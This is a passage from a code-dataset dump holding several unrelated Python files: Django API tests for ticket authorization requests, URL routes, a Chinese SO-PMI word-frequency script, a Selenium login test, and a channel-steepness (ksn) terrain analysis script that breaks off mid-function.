+{"seq_id":"476413934","text":"import secrets\nfrom unittest.mock import patch\n\nfrom django.test import override_settings\n\nfrom alerts import engine\nfrom alerts.collector import target_controllers\nfrom alerts.models import Ticket, TicketLog, Broadcast, AuthorizationRequest\nfrom alerts.modules.rules import Rule\nfrom alerts.tests.base import with_test_modules\nfrom api.tests.base import BaseTestCase\nfrom api.v1.handlers.alert_utils import get_ticket_bucket\nfrom api.v1.serializers.user_serializers import serialize_author\nfrom documents.tests.utils import with_fake_docs\nfrom remotes.models import Remote\n\n\n@override_settings(STACK_IS_SML=False)\nclass TicketViewTestCase(BaseTestCase):\n\n def api_url(self, *suffixes):\n prefix = f\"/api/{self.api_version}/target/{self.target}/ticket\"\n url = \"/\".join([\n prefix,\n *suffixes\n ])\n return url + (\"\" if url.endswith(\"/\") else \"/\")\n\n @with_test_modules\n def setUp(self):\n self.tickets = []\n self.controllers = target_controllers(self.target_object)\n for index, (module, controller) in enumerate(self.controllers.items()):\n ticket = Ticket.objects.create(\n module=module,\n state=list(controller.states)[0],\n result_state={\"level\": index, \"short_message\": \"test\"},\n target=self.target_object,\n archived=index % 2 != 0,\n evaluable=index % 3 == 0,\n groups=\"/\" + \"/\".join(controller.visibility_groups) + \"/\",\n )\n TicketLog.objects.create(\n ticket=ticket,\n meta={\"description\": \"testestest 1\"},\n )\n TicketLog.objects.create(\n ticket=ticket,\n meta={\"description\": \"testestest 2\"},\n )\n Broadcast.objects.create(\n ticket=ticket,\n handlers=[],\n )\n self.tickets.append(ticket)\n module, controller = next(iter(self.controllers.items()))\n self.tickets.append(Ticket.objects.create(\n module=module,\n state=Ticket.TicketState.CLOSED,\n target=self.target_object,\n groups=\"/\" + \"/\".join(controller.visibility_groups) + \"/\",\n ))\n self.as_authority()\n\n @with_test_modules\n def test_list_tickets(self):\n with self.subTest(\"unfiltered\"):\n response = self.client_get(self.api_url())\n self.assertResponseOk(response)\n self.assertEqual(response.data[\"count\"], len(self.tickets))\n\n with self.subTest(\"open\"):\n response = self.client_get(self.api_url(), {\"open\": \"yEs\"})\n self.assertResponseOk(response)\n self.assertEqual(\n response.data[\"count\"],\n len([t for t in self.tickets if t.state != Ticket.TicketState.CLOSED])\n )\n\n with self.subTest(\"closed\"):\n response = self.client_get(self.api_url(), {\"open\": \"nO\"})\n self.assertResponseOk(response)\n self.assertEqual(\n response.data[\"count\"],\n len([t for t in self.tickets if t.state == Ticket.TicketState.CLOSED])\n )\n\n with self.subTest(\"archived\"):\n response = self.client_get(self.api_url(), {\"archived\": \"true\"})\n self.assertResponseOk(response)\n self.assertTrue(all(t[\"archived\"] for t in response.data[\"results\"]))\n\n with self.subTest(\"not evaluable\"):\n response = self.client_get(self.api_url(), {\"evaluable\": \"false\"})\n self.assertResponseOk(response)\n self.assertTrue(all(not t[\"evaluable\"] for t in response.data[\"results\"]))\n\n with self.subTest(\"by module\"):\n module = list(self.controllers)[0]\n response = self.client_get(self.api_url(), {\"module\": module})\n self.assertResponseOk(response)\n self.assertEqual(\n response.data[\"count\"],\n len([t for t in self.tickets if t.module == module])\n )\n\n with self.subTest(\"by level range\"):\n response = self.client_get(self.api_url(), 
{\"level_gt\": 2, \"level_lte\": 4})\n self.assertResponseOk(response)\n self.assertTrue(all(\n t[\"result_state\"][\"level\"] in (3, 4) for t in response.data[\"results\"]\n ))\n\n with self.subTest(\"by group\"):\n response = self.client_get(self.api_url(), {\"group\": \"loremipsum\"})\n self.assertResponseOk(response)\n self.assertEqual(\n response.data[\"count\"],\n len([\n t for t in self.tickets\n if \"loremipsum\" in t.base_controller.visibility_groups\n ])\n )\n\n @with_test_modules\n def test_read_ticket(self):\n response = self.client_get(self.api_url(self.tickets[0].pk))\n self.assertResponseOk(response)\n self.assertEqual(len(response.data[\"logs\"]), self.tickets[0].logs.count())\n self.assertEqual(len(response.data[\"broadcasts\"]), self.tickets[0].broadcasts.count())\n\n @with_test_modules\n def test_archive_ticket(self):\n with self.subTest(\"fail without description\"):\n response = self.client_post(self.api_url(self.tickets[0].pk, \"archive\"), data={\n \"archived\": True,\n })\n self.assertResponseStatus(400, response)\n\n with self.subTest(\"archive normally\"):\n response = self.client_post(self.api_url(self.tickets[0].pk, \"archive\"), data={\n \"archived\": True,\n \"description\": \"Because it bored me\",\n })\n self.assertResponseOk(response)\n self.assertEqual(response.data[\"archived\"], True)\n log = response.data[\"logs\"][0]\n self.assertEqual(log[\"meta\"][\"description\"], \"Because it bored me\")\n self.assertEqual(log[\"meta\"].get(\"previous_archived\"), False)\n self.assertEqual(log[\"meta\"].get(\"next_archived\"), True)\n self.assertEqual(log[\"author\"][\"username\"], self.authority_user[\"username\"])\n\n with self.subTest(\"archive a second time (noop)\"):\n response = self.client_post(self.api_url(self.tickets[0].pk, \"archive\"), data={\n \"archived\": True,\n \"description\": \"No reason\",\n })\n self.assertResponseOk(response)\n self.assertEqual(response.data[\"archived\"], True)\n log = response.data[\"logs\"][0]\n self.assertNotEqual(log[\"meta\"][\"description\"], \"No reason\")\n\n with self.subTest(\"unarchive normally\"):\n response = self.client_post(self.api_url(self.tickets[0].pk, \"archive\"), data={\n \"archived\": False,\n \"description\": \"Because I'm not bored anymore\",\n })\n self.assertResponseOk(response)\n self.assertEqual(response.data[\"archived\"], False)\n log = response.data[\"logs\"][0]\n self.assertEqual(log[\"meta\"][\"description\"], \"Because I'm not bored anymore\")\n self.assertEqual(log[\"meta\"].get(\"previous_archived\"), True)\n self.assertEqual(log[\"meta\"].get(\"next_archived\"), False)\n self.assertEqual(log[\"author\"][\"username\"], self.authority_user[\"username\"])\n\n @with_test_modules\n def test_list_broadcasts(self):\n response = self.client_get(self.api_url(self.tickets[0].pk, \"broadcast\"))\n self.assertResponseOk(response)\n self.assertEqual(response.data[\"count\"], self.tickets[0].broadcasts.count())\n\n @with_test_modules\n def test_read_broadcast(self):\n response = self.client_get(self.api_url(\n self.tickets[0].pk,\n \"broadcast\",\n self.tickets[0].broadcasts.first().pk\n ))\n self.assertResponseOk(response)\n self.assertEqual(response.data[\"id\"], self.tickets[0].broadcasts.first().pk)\n\n @with_test_modules\n def test_create_broadcast(self):\n response = self.client_post(\n self.api_url(self.tickets[0].pk, \"broadcast\"),\n {\"handlers\": [{\"name\": \"testestest\"}]},\n )\n self.assertResponseOk(response)\n self.assertEqual(\n response.data[\"id\"],\n 
Broadcast.objects.filter(ticket=self.tickets[0]).first().pk,\n )\n\n def setup_manual_action(self):\n module = '_.ipsum.dolor'\n # close any ticket open in setup\n Ticket.objects.filter(module=module).update(state=Ticket.TicketState.CLOSED)\n # create new ticket to test on\n ticket = Ticket.objects.create(\n module=module,\n state='A',\n target=self.target_object\n )\n\n # run engine to update conditions\n engine.run(self.target_object, [module])\n ticket.refresh_from_db()\n self.assertTrue(len(ticket.close_conditions) > 0)\n self.assertTrue(len(ticket.archive_conditions) > 0)\n self.assertIn('B', ticket.escalate_conditions)\n return ticket, module\n\n @with_test_modules\n def test_create_authorization_request(self):\n ticket, module = self.setup_manual_action()\n\n with self.subTest('close'):\n # required authorizations (from _.ipsum.dolor definition)\n required_authorizations = [\n 'ticket.A.close.authorization.miner-2',\n 'ticket.A.close.authorization.miner-3',\n 'ticket.A.close.authorization.authority-3',\n ]\n\n def execute_request():\n return self.client_post(\n self.api_url(ticket.pk, \"authorization\"),\n {\"action\": 'close'},\n )\n\n # Check whether there are no logs at the begining\n logs = TicketLog.objects.filter(ticket=ticket)\n self.assertEqual(len(logs), 0)\n\n # create first authorization\n response = execute_request()\n self.assertResponseOk(response)\n auth_request = AuthorizationRequest.objects.filter(ticket=ticket, id=response.data[\"id\"]).first()\n self.assertIsNotNone(auth_request)\n\n self.assertEqual(auth_request.authorization, required_authorizations[0])\n self.assertEqual(auth_request.status, AuthorizationRequest.Status.PENDING)\n self.assertDictEqual(auth_request.created_by, serialize_author(self.authority_user_object))\n self.assertIsNotNone(auth_request.created_at)\n self.assertIsNone(auth_request.resolved_by)\n self.assertIsNone(auth_request.resolved_at)\n self.assertIsNone(auth_request.comment)\n\n # Check there is a new log entry related to the created request\n logs = TicketLog.objects.filter(ticket=ticket)\n self.assertEqual(len(logs), 1)\n self.assertEqual(logs.first().meta['description'], Rule.ActionDescription.REQUEST)\n\n # try to create again\n response = execute_request()\n # can not create again because of pending request\n self.assertResponseStatus(400, response)\n\n # Check there is no new log entry after trying to create the request again\n logs = TicketLog.objects.filter(ticket=ticket)\n self.assertEqual(len(logs), 1)\n\n # deny first request\n auth_request.status = AuthorizationRequest.Status.DENIED\n auth_request.save()\n\n # create and approve all three authorizations\n for authorization in required_authorizations:\n response = execute_request()\n self.assertResponseOk(response)\n auth_request = AuthorizationRequest.objects.get(id=response.data[\"id\"])\n self.assertEqual(auth_request.authorization, authorization)\n\n # approve first request\n auth_request.status = AuthorizationRequest.Status.APPROVED\n auth_request.save()\n # run engine to update conditions\n engine.run(self.target_object, [module])\n\n # try to create a fourth request\n response = execute_request()\n # can not create because all possible request are already approved\n self.assertResponseStatus(400, response)\n\n with self.subTest('archive'):\n # create archive authorization\n response = self.client_post(\n self.api_url(ticket.pk, \"authorization\"),\n {\"action\": 'archive'},\n )\n self.assertResponseOk(response)\n auth_request = 
AuthorizationRequest.objects.filter(ticket=ticket, id=response.data[\"id\"]).first()\n self.assertIsNotNone(auth_request)\n\n # required authorizations (from _.ipsum.dolor definition)\n self.assertEqual(auth_request.authorization, 'ticket.A.archive.authorization.authority-3')\n\n with self.subTest('escalate'):\n # create escalate authorization\n response = self.client_post(\n self.api_url(ticket.pk, \"authorization\"),\n {\"action\": 'escalate', \"to_state\": 'B'},\n )\n self.assertResponseOk(response)\n auth_request = AuthorizationRequest.objects.filter(ticket=ticket, id=response.data[\"id\"]).first()\n self.assertIsNotNone(auth_request)\n\n # required authorizations (from _.ipsum.dolor definition)\n self.assertEqual(auth_request.authorization, 'ticket.A.escalate.B.authorization.miner-3')\n\n with self.subTest('invalid escalate state'):\n # to state None\n self.assertResponseStatus(400, self.client_post(\n self.api_url(ticket.pk, \"authorization\"),\n {\"action\": 'escalate'},\n ))\n\n # to state without conditions\n self.assertResponseStatus(400, self.client_post(\n self.api_url(ticket.pk, \"authorization\"),\n {\"action\": 'escalate', \"to_state\": 'C'},\n ))\n\n # to state invalid\n self.assertResponseStatus(400, self.client_post(\n self.api_url(ticket.pk, \"authorization\"),\n {\"action\": 'escalate', \"to_state\": 'a non existent level'},\n ))\n\n with self.subTest('action does not exists'):\n response = self.client_post(\n self.api_url(ticket.pk, \"authorization\"),\n {\"action\": \"invalid action\"},\n )\n self.assertResponseStatus(400, response)\n\n with self.subTest('saving generic state letter'):\n module = '_.ipsum.amet'\n # create new ticket to test on\n ticket = Ticket.objects.create(\n module=module,\n state='A1',\n target=self.target_object\n )\n # run engine to update conditions\n engine.run(self.target_object, [module])\n ticket.refresh_from_db()\n\n # create escalate authorization\n response = self.client_post(\n self.api_url(ticket.pk, \"authorization\"),\n {\"action\": 'escalate', \"to_state\": 'B'},\n )\n self.assertResponseOk(response)\n auth_request = AuthorizationRequest.objects.filter(ticket=ticket, id=response.data[\"id\"]).first()\n self.assertIsNotNone(auth_request)\n # Authorization string must have a generic state A, instead of A1\n self.assertEqual(auth_request.authorization, 'ticket.A.escalate.B.authorization.miner-3')\n\n # Update ticket state to B1-1\n Ticket.objects.filter(module=module).update(state='B1-1')\n # run engine to update conditions\n engine.run(self.target_object, [module])\n ticket.refresh_from_db()\n # create another escalate authorization\n response = self.client_post(\n self.api_url(ticket.pk, \"authorization\"),\n {\"action\": 'escalate', \"to_state\": 'C'},\n )\n self.assertResponseOk(response)\n auth_request = AuthorizationRequest.objects.filter(ticket=ticket, id=response.data[\"id\"]).first()\n self.assertIsNotNone(auth_request)\n # Authorization string must have a generic state B, instead of B1-1\n self.assertEqual(auth_request.authorization, 'ticket.B.escalate.C.authorization.miner-3')\n\n @with_test_modules\n @override_settings(STACK_IS_SML=True, SMC_BROKER_URL='smc-broker')\n @patch('remotes.dispatch.send_messages')\n def test_create_authorization_request_sml_sends_message(self, send_messages):\n ticket, module = self.setup_manual_action()\n\n # only authority authorizations required messages between sml-smc\n close_authorizations = [\n ('ticket.A.close.authorization.miner-2', False),\n ('ticket.A.close.authorization.miner-3', 
False),\n ('ticket.A.close.authorization.authority-3', True),\n ]\n\n # create and approve all three authorizations\n for authorization, should_send_message in close_authorizations:\n send_messages.reset_mock()\n response = self.client_post(\n self.api_url(ticket.pk, \"authorization\"),\n {\"action\": 'close'},\n )\n self.assertResponseOk(response)\n auth_request = AuthorizationRequest.objects.get(id=response.data[\"id\"])\n self.assertEqual(auth_request.authorization, authorization)\n\n if should_send_message:\n # assert send_messages was called with execute intent command\n send_messages.assert_called_once()\n (messages, broker_url, broker_connection_ssl), _ = send_messages.call_args\n self.assertEqual(len(messages), 1)\n self.assertEqual(broker_url, 'smc-broker')\n self.assertEqual(messages[0].command, 'alerts.ticket.authorization.create')\n self.assertEqual(messages[0].body['id'], auth_request.id)\n else:\n send_messages.assert_not_called()\n\n # approve request\n auth_request.status = AuthorizationRequest.Status.APPROVED\n auth_request.save()\n # run engine to update conditions\n engine.run(self.target_object, [module])\n\n def assertUpdateRequest(self, ticket, url, comment, result_status, origin, docs):\n auth_request = AuthorizationRequest.objects.create(\n id=f'random_id-{secrets.token_urlsafe(8)}',\n ticket=ticket,\n authorization='ticket.A.close.authorization.authority-3',\n origin=origin\n )\n response = self.client.post(\n self.api_url(ticket.pk, \"authorization\", auth_request.pk, url),\n {\n \"comment\": comment,\n **{doc.name: doc.file for doc in docs}\n }\n )\n self.assertResponseOk(response)\n auth_request.refresh_from_db()\n self.assertEqual(auth_request.status, result_status)\n self.assertEqual(auth_request.comment, comment)\n self.assertEqual(auth_request.resolved_by, serialize_author(self.authority_user_object))\n ticket.refresh_from_db()\n return auth_request\n\n @patch('remotes.dispatch.send_messages')\n def assertUpdateRequestFromSMC(self, ticket, url, comment, docs, result_status, send_messages):\n target = ticket.target\n target.remote = Remote.objects.create(namespace='sml_namespace', exchange='sml_exchange', bucket='sml_bucket')\n target.save()\n\n auth_request = self.assertUpdateRequest(ticket, url, comment, result_status, 'sml_namespace', docs)\n\n send_messages.assert_called_once()\n (messages, broker_url, broker_connection_ssl), _ = send_messages.call_args\n self.assertEqual(len(messages), 1)\n self.assertEqual(messages[0].command, 'alerts.ticket.authorization.update')\n self.assertEqual(messages[0].body['id'], auth_request.id)\n self.assertEqual(messages[0].body['status'], auth_request.status)\n self.assertEqual(messages[0].body['comment'], auth_request.comment)\n self.assertDictEqual(messages[0].body['resolved_by'], auth_request.resolved_by)\n self.assertEqual(messages[0].exchange, target.remote.exchange)\n self.assertEqual(broker_url, 'smc_broker')\n\n @with_test_modules\n @override_settings(STACK_IS_SML=True)\n @with_fake_docs(count=3)\n def test_approve_authorization_request(self, docs):\n ticket, _ = self.setup_manual_action()\n self.assertFalse(ticket.close_conditions[2]['complete'])\n self.assertUpdateRequest(ticket, \"approve\", \"a comment\", AuthorizationRequest.Status.APPROVED, 'origin', docs)\n self.assertTrue(ticket.close_conditions[2]['complete'])\n\n # Check there is a new log entry with the positive resolution\n logs = TicketLog.objects.filter(ticket=ticket)\n self.assertEqual(len(logs), 1)\n 
self.assertEqual(logs.first().meta['description'], Rule.ActionDescription.AUTHORIZATION)\n self.assertEqual(logs.first().meta['status'], AuthorizationRequest.Status.APPROVED)\n self.assertEqual(logs.first().meta['comment'], \"a comment\")\n self.assertEqual(logs.first().documents.count(), 3)\n\n @with_test_modules\n @override_settings(STACK_IS_SML=False, BROKER_URL='smc_broker', NAMESPACE='smc_namespace')\n @patch('documents.utils.upload_doc')\n @with_fake_docs(count=8)\n def test_approve_authorization_smc_request(self, upload_doc, docs):\n upload_doc.return_value = True\n ticket, _ = self.setup_manual_action()\n self.assertUpdateRequestFromSMC(ticket, \"approve\", \"a comment\", docs[1:4], AuthorizationRequest.Status.APPROVED)\n self.assertEqual(upload_doc.call_count, 3)\n doc_names = [doc.name for doc in docs[1:4]]\n for call in upload_doc.call_args_list:\n # call == ((doc, s3, bucket, file_path), ())\n self.assertEqual(len(call[0]), 4)\n self.assertIn(call[0][0].name, doc_names)\n self.assertEqual(call[0][2], get_ticket_bucket(ticket))\n # false after approval because update has to be done in SML\n self.assertFalse(ticket.close_conditions[2]['complete'])\n\n @with_test_modules\n @override_settings(STACK_IS_SML=True)\n @with_fake_docs(count=3)\n def test_deny_authorization_request(self, docs):\n ticket, _ = self.setup_manual_action()\n self.assertUpdateRequest(ticket, \"deny\", \"denied comment\", AuthorizationRequest.Status.DENIED, 'origin', docs)\n self.assertFalse(ticket.close_conditions[2]['complete'])\n\n # Check there is a new log entry with the negative resolution\n logs = TicketLog.objects.filter(ticket=ticket)\n self.assertEqual(len(logs), 1)\n self.assertEqual(logs.first().meta['description'], Rule.ActionDescription.AUTHORIZATION)\n self.assertEqual(logs.first().meta['status'], AuthorizationRequest.Status.DENIED)\n self.assertEqual(logs.first().meta['comment'], \"denied comment\")\n self.assertEqual(logs.first().documents.count(), 3)\n\n @with_test_modules\n @override_settings(STACK_IS_SML=False, BROKER_URL='smc_broker', NAMESPACE='smc_namespace')\n def test_deny_authorization_smc_request(self):\n ticket, _ = self.setup_manual_action()\n self.assertUpdateRequestFromSMC(ticket, \"deny\", \"denied comment\", [], AuthorizationRequest.Status.DENIED)\n self.assertFalse(ticket.close_conditions[2]['complete'])\n\n @with_test_modules\n def test_list_logs(self):\n response = self.client_get(self.api_url(self.tickets[0].pk, \"log\"))\n self.assertResponseOk(response)\n self.assertEqual(response.data[\"count\"], self.tickets[0].logs.count())\n\n @with_test_modules\n def test_read_log(self):\n response = self.client_get(self.api_url(\n self.tickets[0].pk,\n \"log\",\n self.tickets[0].logs.first().pk,\n ))\n self.assertResponseOk(response)\n self.assertEqual(response.data[\"id\"], self.tickets[0].logs.first().pk)\n\n @with_test_modules\n @with_fake_docs(count=5)\n def test_create_log(self, docs):\n ticket = self.tickets[0]\n\n with self.subTest(\"without documents\"):\n response = self.client_post(\n self.api_url(self.tickets[0].pk, \"log\"),\n {\"message\": \"Test without documents\"},\n )\n self.assertResponseOk(response)\n log = TicketLog.objects.filter(ticket=ticket).first()\n self.assertNotEqual(log, None)\n self.assertEqual(response.data[\"id\"], log.pk)\n self.assertEqual(log.documents.count(), 0)\n\n with self.subTest(\"with documents\"):\n response = self.client_post(\n self.api_url(self.tickets[0].pk, \"log\"),\n {\n **{doc.name: doc.file for doc in docs[0:3]},\n \"message\": 
\"Test with documents\",\n },\n format='multipart'\n )\n self.assertResponseOk(response)\n log = TicketLog.objects.filter(ticket=ticket).first()\n self.assertIsNotNone(log)\n self.assertEqual(response.data[\"id\"], log.pk)\n self.assertEqual(log.documents.count(), 3)\n\n @with_test_modules\n def test_read_all_authorization_requests(self):\n auth_requests = [\n AuthorizationRequest.objects.create(\n id=f'random_id-{secrets.token_urlsafe(8)}',\n ticket=self.tickets[0],\n authorization='ticket.A.close.authorization.authority-3',\n origin='origin'\n ),\n AuthorizationRequest.objects.create(\n id=f'random_id-{secrets.token_urlsafe(8)}',\n ticket=self.tickets[1],\n authorization='ticket.B.archive.authorization.miner-1',\n origin='origin'\n ),\n AuthorizationRequest.objects.create(\n id=f'random_id-{secrets.token_urlsafe(8)}',\n ticket=self.tickets[2],\n authorization='ticket.A.escalate.authorization.authority-2',\n origin='origin'\n )\n ]\n response = self.client_get(f'/api/{self.api_version}/ticket-requests/')\n self.assertResponseOk(response)\n self.assertEqual(len(response.data[\"results\"]), len(auth_requests))\n","sub_path":"tranque_v1.5.1_source/backend-v1.5.1/src/api/v1/tests/alert/test_ticket_views.py","file_name":"test_ticket_views.py","file_ext":"py","file_size_in_byte":26458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"639446428","text":"from django.conf.urls import url\n# Deprecated\nfrom annotation_app import views_deprecated\n\n\n### Subjects URLs\nurlpatterns = [\n\n url(r'^$', views_deprecated.subject_list, name='subjects'),\n url(r'^get_subject_list/$', views_deprecated.get_subject_list, name='get_subject_list'),\n url(r'^get_subject_bills/$', views_deprecated.get_subject_bills,\n name='get_subject_bills'),\n url(r'^(?P\\d+)/$', views_deprecated.subject, name='subject'),\n]\n","sub_path":"annotation_app/routes/subjects_routes.py","file_name":"subjects_routes.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"115642585","text":"import pandas as pd\nimport numpy as np\nimport math\nfrom pyhanlp import *\n\n\ndef read_file(filename):\n f = open(filename)\n words = []\n for l in f:\n words.append(l.strip())\n f.close()\n return words\n\n\ndef collect_stats(filename):\n result_df = pd.read_csv(filename)\n valid_titles = result_df[result_df['标题'] != \"[]\"]['标题']\n valid_titles.to_csv('intermediate_data/all_titles.csv')\n print('Entry count:')\n print('\\tTotal: {}'.format(result_df.shape[0]))\n print('\\tValid: {}'.format(valid_titles.shape[0]))\n\n stopwords_path = 'hit_stopwords.txt'\n stopwords = read_file(stopwords_path)\n print('Stopword count:')\n print('\\tTotal: {}'.format(len(stopwords)))\n\n TermFrequency = JClass('com.hankcs.hanlp.corpus.occurrence.TermFrequency')\n TermFrequencyCounter = JClass('com.hankcs.hanlp.mining.word.TermFrequencyCounter')\n counter = TermFrequencyCounter()\n for title in valid_titles:\n counter.add(title)\n print('Word count (in the entries):')\n total_word_count = counter.size()\n print('\\tTotal: {}'.format(total_word_count))\n\n freq_dict = {}\n for termFreq in counter:\n if termFreq.getTerm() not in stopwords:\n freq_dict[termFreq.getTerm()] = termFreq.getFrequency()\n df = pd.DataFrame.from_dict(freq_dict, orient='index', columns=['Frequency']).sort_values(by=\"Frequency\", ascending=False)\n df.to_csv('intermediate_data/word_freq.csv')\n print('\\tValid: {}'.format(df.shape[0]))\n\n single_count = df[df['Frequency'] == 1].shape[0]\n threshold = (-1 + math.sqrt(1 + 8 * single_count)) / 2\n print(\"Frequency threshold:\")\n print(\"\\tValue: {}\".format(threshold))\n\n high_freq_df = df[df['Frequency'] >= threshold]\n\n hf_words = high_freq_df.index.values\n filepath = \"intermediate_data/high_freq_words.txt\"\n f = open(filepath, \"w\")\n for hf_word in hf_words:\n f.write(hf_word + '\\n')\n f.close()\n\n print('Categorized word count:')\n print('\\tHigh frequency: {}'.format(high_freq_df.shape[0]))\n print('High frequency words have been written to {}'.format(filepath))\n\n\ndef check_combined_freq(word1, word2, all_titles):\n count = 0\n for title in all_titles:\n if word1 in title and word2 in title:\n count += 1\n return count\n\n\ndef pmi(word1, word2, word_freq, total_word_count, all_titles):\n p_word1 = float(word_freq.loc[word1] / total_word_count)\n p_word2 = float(word_freq.loc[word2] / total_word_count)\n p_word12 = float(check_combined_freq(word1, word2, all_titles) / total_word_count)\n\n val = float(p_word12 / (p_word1 * p_word2))\n if val != 0:\n return math.log(val, 2)\n return 0\n\n\ndef so_pmi(word, pwords, nwords, word_freq, total_word_count, all_titles):\n pmi1 = 0\n for pword in pwords:\n pmi1 += pmi(word, pword, word_freq, total_word_count, all_titles)\n pmi2 = 0\n for nword in nwords:\n pmi2 += pmi(word, nword, word_freq, total_word_count, all_titles)\n return pmi1 - pmi2\n\n\ndef output_so_pmi():\n nwords = read_file('categories/negative.txt')\n pwords = read_file('categories/positive.txt')\n neutral_words = read_file('categories/neutral.txt')\n\n word_freq = pd.read_csv('intermediate_data/word_freq.csv', index_col=0)\n all_titles = pd.read_csv('intermediate_data/all_titles.csv')['标题']\n total_word_count = word_freq['Frequency'].sum()\n print('Total word count: {}'.format(total_word_count))\n so_pmi_dict = {}\n for word in neutral_words:\n val = so_pmi(word, pwords, nwords, word_freq, total_word_count, all_titles)\n so_pmi_dict[word] = val\n # val = so_pmi('今天', pwords, nwords, word_freq, total_word_count, all_titles)\n # 
so_pmi_dict['今天'] = val\n print(so_pmi_dict)\n\n so_pmi_df = pd.DataFrame.from_dict(data=so_pmi_dict, orient='index')\n so_pmi_df.to_csv('intermediate_data/sopmi.csv')\n\n\nif __name__ == '__main__':\n # collect_stats('result.csv')\n # output_so_pmi()\n print(\"zzz\")","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"279991095","text":"# -*- coding: utf-8 -*-\nimport unittest\nfrom src.functions.Functions import Functions\nfrom src.parts.Login import Login \nfrom src.parts.Menu import Menu\n\nimport allure\n\n\n@allure.feature(u'Login Oldelval')\n@allure.story(u'008: Loguearse exitosamente en la aplicación')\n@allure.testcase(u\"Caso de Prueba 008\", u'http://my.tms.org/browse/TESTCASE-39')\n@allure.severity(allure.severity_level.NORMAL)\n@allure.description(u\"\"\"El Usuario se loguea en la aplicación:\n-- Ingresa a pantralla de inicio. \n-- Ingresa un usuario valido. \n-- Ingresa una contraseña correcta. \n\"\"\")\nclass tst_008(unittest.TestCase,Login, Menu, Functions):\n\n def setUp(self):\n with allure.step(u'Ingresar a la aplicación'):\n self.driver = self.abrir_Navegador(\"http://oldelval.practia.global/\")\n self.User = self.LeerCelda('A1')\n self.Password = self.LeerCelda('B1')\n\n def test_008(self):\n with allure.step(u\"Se loguea en la aplicacion\"):\n self.Login_app()\n \n with allure.step(u\"Ductos E ingresos ------> Punto de Ingreso\"):\n self.Menu_DuctosEInstalaciones_PuntoDeIngreso()\n \n \n def tearDown(self):\n self.driver.quit()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"TestAutomation/src/tests/tst_008.py","file_name":"tst_008.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"545784981","text":"import dem as d\nimport csv\nimport numpy as np\nimport matplotlib.pylab as plt\n\ndef read_csv(filename):\n with open(filename, 'rb') as f:\n reader = csv.reader(f)\n return list(reader)\n \ndef best_ksn(ksi, scaled_relief, xo = 500):\n \n A = np.vstack([ksi-np.ones(len(ksi))*float(xo)]).T \n return np.linalg.lstsq(A, scaled_relief)\n\ndef best_chi_ksn(chi, scaled_relief, xo = 500):\n \n A = np.vstack([chi]).T\n return np.linalg.lstsq(A, scaled_relief)\n\ndef best_ks_and_theta_with_wrss(elevation, flow_direction, area, outlet, xo = 500):\n \n import scipy.optimize\n chi_ks = lambda theta: best_ks_with_wrss(elevation, flow_direction, area, theta, outlet, xo)[1]\n if len(chi_ks(0.5)) == 0:\n return (0, 0, 0)\n xopt = scipy.optimize.fmin(func=chi_ks, x0=np.array([0.5]))\n (m, WRSS) = best_ks_with_wrss(elevation, flow_direction, area, xopt[0], outlet, xo)\n SS = uninformative_SS(elevation, flow_direction, area, outlet, xopt[0], xo)\n \n return (m, xopt[0], 1 - (WRSS / SS))\n \ndef best_ks_and_theta_with_clip(elevation, flow_direction, area, outlet, area_measured, xo = 500, pixel_radius = 5):\n \n bounds = flow_direction.bounds_of_basin_for_outlet(outlet);\n elev_clip = elevation.clip_to_bounds(bounds)\n area_clip = area.clip_to_bounds(bounds)\n fd_clip = flow_direction.clip_to_bounds(bounds)\n outlet_xy = (outlet[1], outlet[0])\n locations_snap = area_clip.snap_locations_to_closest_value((outlet_xy, ), (area_measured, ), pixel_radius = pixel_radius)\n return best_ks_and_theta_with_wrss(elev_clip, fd_clip, area_clip, locations_snap, xo)\n\ndef best_ks_with_wrss(elevation, flow_direction, area, theta, outlet, xo = 500):\n \n chi = d.GeographicChi(area = area, flow_direction = flow_direction, theta = theta, outlets = (outlet[0], ), Ao = np.power(xo,2))\n valid_indexes = np.where((chi._griddata != np.NAN) & (elevation._griddata != np.NAN) & (chi._griddata != 0.0))\n outlet_rowscols = flow_direction._xy_to_rowscols((outlet[0], ))[0]\n base_elevation = elevation[outlet_rowscols[0], outlet_rowscols[1]]\n sol = best_chi_ksn(chi._griddata[valid_indexes], elevation._griddata[valid_indexes]-base_elevation)\n m = sol[0]\n WRSS = sol[1] \n \n return (m, WRSS)\n\ndef uninformative_SS(elevation, flow_direction, area, outlet, theta, xo = 500):\n \n chi = d.GeographicChi(area = area, flow_direction = flow_direction, theta = theta, outlets = (outlet[0], ), Ao = np.power(xo,2))\n valid_indexes = np.where((chi._griddata != np.NAN) & (elevation._griddata != np.NAN) & (chi._griddata != 0.0))\n mean_elevation = np.mean(elevation._griddata[valid_indexes])\n return np.sum(np.power(elevation._griddata[valid_indexes]-mean_elevation, 2))\n \ndef find_ksi_scaled_relief(lat, lon, area, ksi, relief, d8, A_measured, pixel_radius = 5):\n \n index = area._xy_to_rowscols(((lon,lat),))[0]\n if index[0] is None:\n return None, None, None\n #row, col = area.find_nearest_cell_with_value(index, A_measured, pixel_radius)\n A_calculated = area[index[0], index[1]]\n indexes_of_area = d8.get_indexes_of_upstream_cells(index[0], index[1])\n ksi_values = list()\n relief_values = list()\n for (row, col) in indexes_of_area:\n if ksi[row,col] is None or relief[row,col] is None or np.isnan(ksi[row, col]) or np.isnan(relief[row,col]):\n return None, None, None\n ksi_values.append(ksi[row,col])\n relief_values.append(relief[row,col])\n return ksi_values, relief_values, A_calculated\n \ndef calculate_ksn_for_data(data, Ao = 250000, theta = 0.5):\n \n import sys\n sys.setrecursionlimit(1000000)\n \n pixel_radius = 
